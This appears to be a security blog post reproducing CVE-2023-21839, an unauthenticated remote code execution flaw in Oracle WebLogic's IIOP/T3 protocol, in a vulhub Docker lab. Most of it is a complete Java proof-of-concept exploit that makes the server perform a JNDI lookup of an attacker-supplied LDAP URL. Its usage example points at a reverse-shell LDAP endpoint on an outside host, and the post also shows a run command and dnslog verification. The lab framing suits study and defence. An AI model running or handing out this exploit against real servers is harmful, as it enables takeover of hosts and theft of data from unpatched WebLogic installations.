Because of a flaw in the WebLogic IIOP/T3 protocol implementation, an unauthenticated attacker who can reach a vulnerable WebLogic Server over the network via IIOP/T3 (when that protocol is enabled) can exploit it. A successful exploit lets the attacker take over the WebLogic Server and execute arbitrary commands, compromising the host or leaking sensitive data.
https://github.com/vulhub/vulhub/tree/master/weblogic/CVE-2023-21839
git clone https://github.com/vulhub/vulhub.git
docker-compose up -d
https://github.com/DXask88MA/Weblogic-CVE-2023-21839
The sink this tool uses is
weblogic.deployment.jms.ForeignOpaqueReference.class
Alternatively, you can use 4ra1n's tool, which builds the T3 packets itself in Go instead of relying on the WebLogic client classes:
https://github.com/4ra1n/CVE-2023-21839
The sink that tool uses is
weblogic.jndi.internal.ForeignOpaqueReference.class
POC:
import javax.naming.Context;
import javax.naming.InitialContext;
import javax.naming.NamingException;
import java.lang.reflect.Field;
import java.util.Hashtable;
import java.util.Random;

public class CVE_2023_21839 {
    static String JNDI_FACTORY = "weblogic.jndi.WLInitialContextFactory";
    static String HOW_TO_USE = "[*]java -jar <target ip:port> <ldap url>\n e.g. java -jar 192.168.220.129:7001 ldap://192.168.31.58:1389/Basic/ReverseShell/192.168.220.129/1111";

    // Open a T3 context against the target; no credentials are required.
    private static InitialContext getInitialContext(String url) throws NamingException {
        Hashtable<String, String> env = new Hashtable<String, String>();
        env.put(Context.INITIAL_CONTEXT_FACTORY, JNDI_FACTORY);
        env.put(Context.PROVIDER_URL, url);
        return new InitialContext(env);
    }

    public static void main(String args[]) throws Exception {
        if (args.length < 2) {
            System.out.println(HOW_TO_USE);
            System.exit(0);
        }
        String t3Url = args[0];
        String ldapUrl = args[1];
        InitialContext c = getInitialContext("t3://" + t3Url);

        // JNDI environment that the server-side ForeignOpaqueReference.getReferent()
        // will use when it builds its own InitialContext.
        Hashtable<String, String> env = new Hashtable<String, String>();
        env.put(Context.INITIAL_CONTEXT_FACTORY, "com.sun.jndi.rmi.registry.RegistryContextFactory");

        // Both fields are private, so they are set by reflection: the environment
        // above and remoteJNDIName, the name the server will look up, which is
        // the attacker's LDAP URL.
        weblogic.deployment.jms.ForeignOpaqueReference f = new weblogic.deployment.jms.ForeignOpaqueReference();
        Field jndiEnvironment = weblogic.deployment.jms.ForeignOpaqueReference.class.getDeclaredField("jndiEnvironment");
        jndiEnvironment.setAccessible(true);
        jndiEnvironment.set(f, env);
        Field remoteJNDIName = weblogic.deployment.jms.ForeignOpaqueReference.class.getDeclaredField("remoteJNDIName");
        remoteJNDIName.setAccessible(true);
        remoteJNDIName.set(f, ldapUrl);

        // bind() stores the reference in the server's JNDI tree under a random name;
        // lookup() then makes the server resolve it, i.e. perform the LDAP lookup.
        String bindName = new Random(System.currentTimeMillis()).nextLong() + "";
        try {
            c.bind(bindName, f);
            c.lookup(bindName);
        } catch (Exception e) {
        }
    }
}
https://github.com/DXask88MA/Weblogic-CVE-2023-21839/releases/tag/CVE-2023-21839
java -jar Weblogic-CVE-2023-21839.jar 127.0.0.1:7001 ldap://81c95c8f.dns.1433.eu.org/test
Check the dnslog platform: the request arrives, so the vulnerability is confirmed. Because the supplied LDAP URL points at a dnslog domain, the server's attempt to resolve it is enough to prove the JNDI lookup happened, without standing up a real LDAP server.
Comment 1F (Beijing):
A simple and intuitive incident-handling process is easier to put into practice, and it saves time as well.